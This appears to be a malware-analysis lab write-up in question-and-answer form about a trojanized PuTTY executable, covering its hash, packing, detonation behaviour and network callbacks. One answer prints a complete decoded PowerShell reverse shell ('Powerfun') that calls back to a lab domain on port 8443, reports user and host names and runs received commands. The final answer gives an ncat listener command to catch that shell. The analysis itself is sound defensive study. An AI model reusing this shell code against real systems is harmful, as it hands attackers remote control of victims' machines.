-
What is the SHA256 hash of the sample?
0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83
-
What architecture is this binary?
Architecture x86 32bits
-
Are there any results from submitting the SHA256 hash to VirusTotal?
VirusTotal
-
Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?
It seems that we cannot extract any interesting strings. Either they’re drowned in the flood of valid strings from the Putty software or due to the malware's possibly packed nature. see Strings
-
Describe the results of inspecting the IAT for this binary. Are there any imports worth noting?
While analysis with PEStudio, it flagged a bunch of imports. However, considering the common usage of Putty, none seems too suspicious. see IAT
-
Is it likely that this binary is packed?
The Virtual and Raw size differ a bit and capa seems to pick up the executable as packed → the binary is most likely packed.
| Raw |
Virtual |
| 169472 octet |
169468 |
WARNING:capa:--------------------------------------------------------------------------------
WARNING:capa: This sample appears to be packed.
WARNING:capa:
WARNING:capa: Packed samples have often been obfuscated to hide their logic.
WARNING:capa: capa cannot handle obfuscation well. This means the results may be misleading or incomplete.
WARNING:capa: If possible, you should try to unpack this input file before analyzing it with capa.
WARNING:capa:
WARNING:capa: Identified via rule: (internal) packer file limitation
WARNING:capa:
WARNING:capa: Use -v or -vv if you really want to see the capabilities identified by capa.
WARNING:capa:--------------------------------------------------------------------------------
-
Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?
With and without internet simulation, the tool launches a Powershell window at detonation.
-
From the host-based indicators perspective, what is the main payload that is initiated at detonation? What tool can you use to identify this?
Using Procmon, we can identify a Powershell child process that has a host connection process as a child.
-
What is the DNS record that is queried at detonation?
Using WireShark without an internet simulator, we can easily intercept DNS requests to bonus2.corporatebonusapplication.local. Note that it is also possible to find this DNS record by analysing the PowerShell process GZip compressed [# Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
function powerfun
{
Param(
[String]$Command,
[String]$Sslcon,
[String]$Download
)
Process {
$modules = @()
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]8443
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("bonus2.corporatebonusapplication.local",8443)
}
$stream = $client.GetStream()
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("bonus2.corporatebonusapplication.local")
$stream = $sslStream
}
[byte[]]$bytes = 0..20000|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
if ($Download -eq "true")
{
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
$listener.Stop()
}
}
powerfun -Command reverse -Sslcon true](https://zhou-efr.notion.site/Powerfun-Written-by-Ben-Turner-Dave-Hardy-function-Get-Webclient-wc-New-Object-TypeN-71594b2924294030939ebffec450fcd9)
-
What is the callback port number at detonation?
Using WireShark again, we can highlight the use of port 8443. We can also achieve this finding by Code analysis or process analysis.
-
What is the callback protocol at detonation?
TCP - see answer above
-
How can you use host-based telemetry to identify the DNS record, port, and protocol?
Procmon and TCPViewer
-
Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?
By analysing the code, we see that the shell requires an SSL connection. Thus, we add the flag --ssl at the end of the Netcat listener to successfully receive the connection from the malware.
ncat -nvlp 8443 --ssl